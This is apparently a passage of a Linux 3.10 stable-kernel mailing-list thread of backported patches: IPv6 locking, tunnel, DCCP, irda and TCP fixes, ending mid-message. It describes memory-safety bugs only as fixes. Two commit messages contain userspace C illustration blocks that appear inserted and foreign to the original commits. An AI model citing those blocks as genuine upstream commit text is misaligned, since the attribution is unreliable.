 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -1739,12 +1735,11 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 	ipv6_dev_ac_inc(ifp->idev->dev, &addr);
 }
 
+/* caller must hold RTNL */
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
 
-	ASSERT_RTNL();
-
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
diff --git a/net/ipv6/anycast.c b/net/ipv6/anycast.c
index 5a80f15..c59083c 100644
--- a/net/ipv6/anycast.c
+++ b/net/ipv6/anycast.c
@@ -77,6 +77,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	pac->acl_next = NULL;
 	pac->acl_addr = *addr;
 
+	rtnl_lock();
 	rcu_read_lock();
 	if (ifindex == 0) {
 		struct rt6_info *rt;
@@ -137,6 +138,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 error:
 	rcu_read_unlock();
+	rtnl_unlock();
 	if (pac)
 		sock_kfree_s(sk, pac, sizeof(*pac));
 	return err;
@@ -171,13 +173,17 @@ int ipv6_sock_ac_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	spin_unlock_bh(&ipv6_sk_ac_lock);
 
+	rtnl_lock();
 	rcu_read_lock();
 	dev = dev_get_by_index_rcu(net, pac->acl_ifindex);
 	if (dev)
 		ipv6_dev_ac_dec(dev, &pac->acl_addr);
 	rcu_read_unlock();
+	rtnl_unlock();
 
 	sock_kfree_s(sk, pac, sizeof(*pac));
+	if (!dev)
+		return -ENODEV;
 	return 0;
 }
 
@@ -198,6 +204,7 @@ void ipv6_sock_ac_close(struct sock *sk)
 	spin_unlock_bh(&ipv6_sk_ac_lock);
 
 	prev_index = 0;
+	rtnl_lock();
 	rcu_read_lock();
 	while (pac) {
 		struct ipv6_ac_socklist *next = pac->acl_next;
@@ -212,6 +219,7 @@ void ipv6_sock_ac_close(struct sock *sk)
 		pac = next;
 	}
 	rcu_read_unlock();
+	rtnl_unlock();
 }
 
 static void aca_put(struct ifacaddr6 *ac)
@@ -233,6 +241,8 @@ int ipv6_dev_ac_inc(struct net_device *dev, const struct in6_addr *addr)
 	struct rt6_info *rt;
 	int err;
 
+	ASSERT_RTNL();
+
 	idev = in6_dev_get(dev);
 
 	if (idev == NULL)
@@ -302,6 +312,8 @@ int __ipv6_dev_ac_dec(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct ifacaddr6 *aca, *prev_aca;
 
+	ASSERT_RTNL();
+
 	write_lock_bh(&idev->lock);
 	prev_aca = NULL;
 	for (aca = idev->ac_list; aca; aca = aca->aca_next) {
diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
index 7ba6180..cf16eb4 100644
--- a/net/ipv6/mcast.c
+++ b/net/ipv6/mcast.c
@@ -157,6 +157,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	mc_lst->next = NULL;
 	mc_lst->addr = *addr;
 
+	rtnl_lock();
 	rcu_read_lock();
 	if (ifindex == 0) {
 		struct rt6_info *rt;
@@ -170,6 +171,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	if (dev == NULL) {
 		rcu_read_unlock();
+		rtnl_unlock();
 		sock_kfree_s(sk, mc_lst, sizeof(*mc_lst));
 		return -ENODEV;
 	}
@@ -187,6 +189,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 
 	if (err) {
 		rcu_read_unlock();
+		rtnl_unlock();
 		sock_kfree_s(sk, mc_lst, sizeof(*mc_lst));
 		return err;
 	}
@@ -197,6 +200,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	spin_unlock(&ipv6_sk_mc_lock);
 
 	rcu_read_unlock();
+	rtnl_unlock();
 
 	return 0;
 }
@@ -214,6 +218,7 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 	if (!ipv6_addr_is_multicast(addr))
 		return -EINVAL;
 
+	rtnl_lock();
 	spin_lock(&ipv6_sk_mc_lock);
 	for (lnk = &np->ipv6_mc_list;
 	     (mc_lst = rcu_dereference_protected(*lnk,
@@ -237,12 +242,15 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr)
 			} else
 				(void) ip6_mc_leave_src(sk, mc_lst, NULL);
 			rcu_read_unlock();
+			rtnl_unlock();
+
 			atomic_sub(sizeof(*mc_lst), &sk->sk_omem_alloc);
 			kfree_rcu(mc_lst, rcu);
 			return 0;
 		}
 	}
 	spin_unlock(&ipv6_sk_mc_lock);
+	rtnl_unlock();
 
 	return -EADDRNOTAVAIL;
 }
@@ -287,6 +295,7 @@ void ipv6_sock_mc_close(struct sock *sk)
 	if (!rcu_access_pointer(np->ipv6_mc_list))
 		return;
 
+	rtnl_lock();
 	spin_lock(&ipv6_sk_mc_lock);
 	while ((mc_lst = rcu_dereference_protected(np->ipv6_mc_list,
 				lockdep_is_held(&ipv6_sk_mc_lock))) != NULL) {
@@ -313,6 +322,7 @@ void ipv6_sock_mc_close(struct sock *sk)
 		spin_lock(&ipv6_sk_mc_lock);
 	}
 	spin_unlock(&ipv6_sk_mc_lock);
+	rtnl_unlock();
 }
 
 int ip6_mc_source(int add, int omode, struct sock *sk,
@@ -830,6 +840,8 @@ int ipv6_dev_mc_inc(struct net_device *dev, const struct in6_addr *addr)
 	struct ifmcaddr6 *mc;
 	struct inet6_dev *idev;
 
+	ASSERT_RTNL();
+
 	/* we need to take a reference on idev */
 	idev = in6_dev_get(dev);
 
@@ -901,6 +913,8 @@ int __ipv6_dev_mc_dec(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct ifmcaddr6 *ma, **map;
 
+	ASSERT_RTNL();
+
 	write_lock_bh(&idev->lock);
 	for (map = &idev->mc_list; (ma=*map) != NULL; map = &ma->next) {
 		if (ipv6_addr_equal(&ma->mca_addr, addr)) {
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (122 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
                   ` (94 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Lance Richardson, David S . Miller, Willy Tarreau

From: Lance Richardson <lrichard@redhat.com>

commit db32e4e49ce2b0e5fcc17803d011a401c0a637f6 upstream.

Similar to commit 3be07244b733 ("ip6_gre: fix flowi6_proto value in
xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.

Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
This affected output route lookup for packets sent on an ip6gretap device
in cases where routing was dependent on the value of flowi6_proto.

Since the correct proto is already set in the tunnel flowi6 template via
commit 252f3f5a1189 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
path."), simply delete the line setting the incorrect flowi6_proto value.
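
A small userspace sketch of why deleting the line is enough: the flow
key is copied from the tunnel template, which already carries the GRE
protocol number, and the removed assignment overwrote it. The structures
and the apply_removed_line switch are hypothetical; the 8-bit proto
field mirrors flowi6_proto, and 47 is the IANA protocol number for GRE.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_IPPROTO_GRE 47 /* IANA protocol number for GRE */

/* Hypothetical stand-ins for struct flowi6 and the tunnel. */
struct model_flowi6 {
	unsigned char proto; /* 8-bit, like flowi6_proto */
};

struct model_tunnel {
	struct model_flowi6 fl; /* template, proto preset to GRE */
};

/* Models the start of ip6gre_xmit_other(). With apply_removed_line
 * set, it repeats the old behaviour of storing the 16-bit packet
 * protocol into the 8-bit field. */
static struct model_flowi6
model_xmit_other(const struct model_tunnel *t,
		 unsigned short skb_protocol, int apply_removed_line)
{
	struct model_flowi6 fl6;

	assert(t != NULL);
	memcpy(&fl6, &t->fl, sizeof(fl6));
	if (apply_removed_line)
		fl6.proto = (unsigned char)skb_protocol;
	return fl6;
}
```

With the overwrite gone, the route lookup key keeps the value from the
template.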

Suggested-by: Jiri Benc <jbenc@redhat.com>
Fixes: c12b395a4664 ("gre: Support GRE over IPv6")
Reviewed-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Signed-off-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/ip6_gre.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
index 7eb7267..603f251 100644
--- a/net/ipv6/ip6_gre.c
+++ b/net/ipv6/ip6_gre.c
@@ -890,7 +890,6 @@ static int ip6gre_xmit_other(struct sk_buff *skb, struct net_device *dev)
 		encap_limit = t->parms.encap_limit;
 
 	memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
-	fl6.flowi6_proto = skb->protocol;
 
 	err = ip6gre_xmit2(skb, dev, 0, &fl6, encap_limit, &mtu);
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (123 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
                   ` (93 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nicolas Dichtel, Balakumaran Kannan, Maruthi Thotad,
	Sabrina Dubroca, Hannes Frederic Sowa, Weilong Chen, Gao feng,
	David S . Miller, Willy Tarreau

From: Nicolas Dichtel <nicolas.dichtel@6wind.com>

commit a220445f9f4382c36a53d8ef3e08165fa27f7e2c upstream.

The goal of the patch is to fix this scenario:
 ip link add dummy1 type dummy
 ip link set dummy1 up
 ip link set lo down ; ip link set lo up

After that sequence, the local route to the link layer address of dummy1 is
not there anymore.

When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.

In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still set to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.

Fixes: 25fb6ca4ed9c ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f625c ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b110 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 3bfd8a5..a3e2c34 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -2709,7 +2709,7 @@ static void init_loopback(struct net_device *dev)
 				 * lo device down, release this obsolete dst and
 				 * reallocate a new router for ifa.
 				 */
-				if (sp_ifa->rt->dst.obsolete > 0) {
+				if (!atomic_read(&sp_ifa->rt->rt6i_ref)) {
 					ip6_rt_put(sp_ifa->rt);
 					sp_ifa->rt = NULL;
 				} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (124 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 225/319] ipv6: correctly add local routes when lo goes up Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
                   ` (92 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 upstream.

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.
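
As an illustration only, the compile-time check described above can be
sketched in user space. The struct below is a simplified, hypothetical
stand-in for struct dccp_hdr (only the leading fields are modelled), and
OFFSETOFEND and PULLED_BYTES are names made up for this sketch; the idea is
simply to assert at build time that both ports end within the 8 bytes the
caller is said to have pulled.

```c
#include <stddef.h>
#include <stdint.h>

/* Offset of the first byte past 'member' inside 'type' (sketch-local macro). */
#define OFFSETOFEND(type, member) \
	(offsetof(type, member) + sizeof(((type *)0)->member))

/* Hypothetical, simplified header layout: the two ports come first. */
struct demo_dccp_hdr {
	uint16_t sport;
	uint16_t dport;
	uint8_t  doff;
	uint8_t  cscov_ccval;
	uint16_t checksum;
};

/* Bytes assumed to be already linear when the error handler runs. */
#define PULLED_BYTES 8

/* Fail the build if either port could lie beyond the pulled area. */
_Static_assert(OFFSETOFEND(struct demo_dccp_hdr, sport) <= PULLED_BYTES,
	       "sport must fit in the pulled bytes");
_Static_assert(OFFSETOFEND(struct demo_dccp_hdr, dport) <= PULLED_BYTES,
	       "dport must fit in the pulled bytes");

/* Helper so the result can also be inspected at run time. */
static size_t demo_ports_end(void)
{
	return OFFSETOFEND(struct demo_dccp_hdr, dport);
}
```

With this layout the ports end at byte 4, so no run-time length check is
needed before reading them.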

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv6.c | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 6cf9f77..fb72107 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -83,7 +83,7 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
 			u8 type, u8 code, int offset, __be32 info)
 {
 	const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
-	const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+	const struct dccp_hdr *dh;
 	struct dccp_sock *dp;
 	struct ipv6_pinfo *np;
 	struct sock *sk;
@@ -91,12 +91,13 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
 	__u64 seq;
 	struct net *net = dev_net(skb->dev);
 
-	if (skb->len < offset + sizeof(*dh) ||
-	    skb->len < offset + __dccp_basic_hdr_len(dh)) {
-		ICMP6_INC_STATS_BH(net, __in6_dev_get(skb->dev),
-				   ICMP6_MIB_INERRORS);
-		return;
-	}
+	/* Only need dccph_dport & dccph_sport which are the first
+	 * 4 bytes in dccp header.
+	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+	 */
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+	dh = (struct dccp_hdr *)(skb->data + offset);
 
 	sk = inet6_lookup(net, &dccp_hashinfo,
 			&hdr->daddr, dh->dccph_dport,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (125 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 226/319] ipv6: dccp: fix out of bound access in dccp_v6_err() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
                   ` (91 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Arnaldo Carvalho de Melo, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 990ff4d84408fc55942ca6644f67e361737b3d8e upstream.

While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.

Fixes: ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv6.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index fb72107..94f8224 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -1014,6 +1014,7 @@ static const struct inet_connection_sock_af_ops dccp_ipv6_mapped = {
 	.getsockopt	   = ipv6_getsockopt,
 	.addr2sockaddr	   = inet6_csk_addr2sockaddr,
 	.sockaddr_len	   = sizeof(struct sockaddr_in6),
+	.bind_conflict	   = inet6_csk_bind_conflict,
 #ifdef CONFIG_COMPAT
 	.compat_setsockopt = compat_ipv6_setsockopt,
 	.compat_getsockopt = compat_ipv6_getsockopt,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (126 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 227/319] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
                   ` (90 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eli Cooper, David S . Miller, Willy Tarreau

From: Eli Cooper <elicooper@gmx.com>

commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 upstream.

skb->cb may contain data from previous layers. In the observed scenario,
the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so
that small packets sent through the tunnel are mistakenly fragmented.

This patch unconditionally clears the control buffer in ip6tunnel_xmit(),
which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of
these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier.

Cc: stable@vger.kernel.org
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/ip6_tunnel.h | 1 +
 1 file changed, 1 insertion(+)

diff --git a/include/net/ip6_tunnel.h b/include/net/ip6_tunnel.h
index 4da5de1..b140c60 100644
--- a/include/net/ip6_tunnel.h
+++ b/include/net/ip6_tunnel.h
@@ -75,6 +75,7 @@ static inline void ip6tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
 	int pkt_len, err;
 
 	nf_reset(skb);
+	memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
 	pkt_len = skb->len;
 	err = ip6_local_out(skb);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (127 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 228/319] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
                   ` (89 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Paolo Abeni, Liam McBirnie, David S . Miller, Willy Tarreau

From: Paolo Abeni <pabeni@redhat.com>

commit b5c2d49544e5930c96e2632a7eece3f4325a1888 upstream.

If an ip6 tunnel is configured to inherit the traffic class from
the inner header, the dst_cache must be disabled or it will foul
the policy routing.

The issue is apparently there since at least Linux-2.6.12-rc2.

Reported-by: Liam McBirnie <liam.mcbirnie@boeing.com>
Cc: Liam McBirnie <liam.mcbirnie@boeing.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/ip6_tunnel.c | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
index 31bab1a..12984e6 100644
--- a/net/ipv6/ip6_tunnel.c
+++ b/net/ipv6/ip6_tunnel.c
@@ -950,12 +950,21 @@ static int ip6_tnl_xmit2(struct sk_buff *skb,
 	struct ipv6_tel_txoption opt;
 	struct dst_entry *dst = NULL, *ndst = NULL;
 	struct net_device *tdev;
+	bool use_cache = false;
 	int mtu;
 	unsigned int max_headroom = sizeof(struct ipv6hdr);
 	u8 proto;
 	int err = -1;
 
-	if (!fl6->flowi6_mark)
+	if (!(t->parms.flags &
+		     (IP6_TNL_F_USE_ORIG_TCLASS | IP6_TNL_F_USE_ORIG_FWMARK))) {
+		/* enable the cache only only if the routing decision does
+		 * not depend on the current inner header value
+		 */
+		use_cache = true;
+	}
+
+	if (use_cache)
 		dst = ip6_tnl_dst_check(t);
 	if (!dst) {
 		ndst = ip6_route_output(net, NULL, fl6);
@@ -1012,7 +1021,7 @@ static int ip6_tnl_xmit2(struct sk_buff *skb,
 		skb = new_skb;
 	}
 	skb_dst_drop(skb);
-	if (fl6->flowi6_mark) {
+	if (!use_cache) {
 		skb_dst_set(skb, dst);
 		ndst = NULL;
 	} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (128 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 229/319] ip6_tunnel: disable caching when the traffic class is inherited Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue() Willy Tarreau
                   ` (88 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Vegard Nossum, David S . Miller, Willy Tarreau

From: Vegard Nossum <vegard.nossum@oracle.com>

commit 5ba092efc7ddff040777ae7162f1d195f513571b upstream.

If iriap_register_lsap() fails to allocate memory, self->lsap is
set to NULL. However, none of the callers handle the failure and
irlmp_connect_request() will happily dereference it:

    iriap_register_lsap: Unable to allocated LSAP!
    ================================================================================
    UBSAN: Undefined behaviour in net/irda/irlmp.c:378:2
    member access within null pointer of type 'struct lsap_cb'
    CPU: 1 PID: 15403 Comm: trinity-c0 Not tainted 4.8.0-rc1+ #81
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org
    04/01/2014
     0000000000000000 ffff88010c7e78a8 ffffffff82344f40 0000000041b58ab3
     ffffffff84f98000 ffffffff82344e94 ffff88010c7e78d0 ffff88010c7e7880
     ffff88010630ad00 ffffffff84a5fae0 ffffffff84d3f5c0 000000000000017a
    Call Trace:
     [<ffffffff82344f40>] dump_stack+0xac/0xfc
     [<ffffffff8242f5a8>] ubsan_epilogue+0xd/0x8a
     [<ffffffff824302bf>] __ubsan_handle_type_mismatch+0x157/0x411
     [<ffffffff83b7bdbc>] irlmp_connect_request+0x7ac/0x970
     [<ffffffff83b77cc0>] iriap_connect_request+0xa0/0x160
     [<ffffffff83b77f48>] state_s_disconnect+0x88/0xd0
     [<ffffffff83b78904>] iriap_do_client_event+0x94/0x120
     [<ffffffff83b77710>] iriap_getvaluebyclass_request+0x3e0/0x6d0
     [<ffffffff83ba6ebb>] irda_find_lsap_sel+0x1eb/0x630
     [<ffffffff83ba90c8>] irda_connect+0x828/0x12d0
     [<ffffffff833c0dfb>] SYSC_connect+0x22b/0x340
     [<ffffffff833c7e09>] SyS_connect+0x9/0x10
     [<ffffffff81007bd3>] do_syscall_64+0x1b3/0x4b0
     [<ffffffff845f946a>] entry_SYSCALL64_slow_path+0x25/0x25
    ================================================================================

The bug seems to have been around since forever.

There are more problems with missing error checks in iriap_init() (and
indeed all of irda_init()), but that's a bigger problem that needs
very careful review and testing. This patch will fix the most serious
bug (as it's easily reached from unprivileged userspace).

I have tested my patch with a reproducer.

Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/irda/iriap.c | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/net/irda/iriap.c b/net/irda/iriap.c
index e1b37f5..bd42516 100644
--- a/net/irda/iriap.c
+++ b/net/irda/iriap.c
@@ -191,8 +191,12 @@ struct iriap_cb *iriap_open(__u8 slsap_sel, int mode, void *priv,
 
 	self->magic = IAS_MAGIC;
 	self->mode = mode;
-	if (mode == IAS_CLIENT)
-		iriap_register_lsap(self, slsap_sel, mode);
+	if (mode == IAS_CLIENT) {
+		if (iriap_register_lsap(self, slsap_sel, mode)) {
+			kfree(self);
+			return NULL;
+		}
+	}
 
 	self->confirm = callback;
 	self->priv = priv;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 231/319] tcp: fix use after free in tcp_xmit_retransmit_queue()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (129 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 230/319] net/irda: handle iriap_register_lsap() allocation failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 232/319] tcp: properly scale window in tcp_v[46]_reqsk_send_ack() Willy Tarreau
                   ` (87 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Eric Dumazet, Ilpo Järvinen, Yuchung Cheng, Neal Cardwell,
	David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit bb1fceca22492109be12640d49f5ea5a544c6bb4 upstream.

When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()

Then it attempts to copy user data into this fresh skb.

If the copy fails, we undo the work and remove the fresh skb.

Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)

Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. For regular kernels where memory is not unmapped,
this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
returning garbage instead of tp->snd_nxt, but with various debug
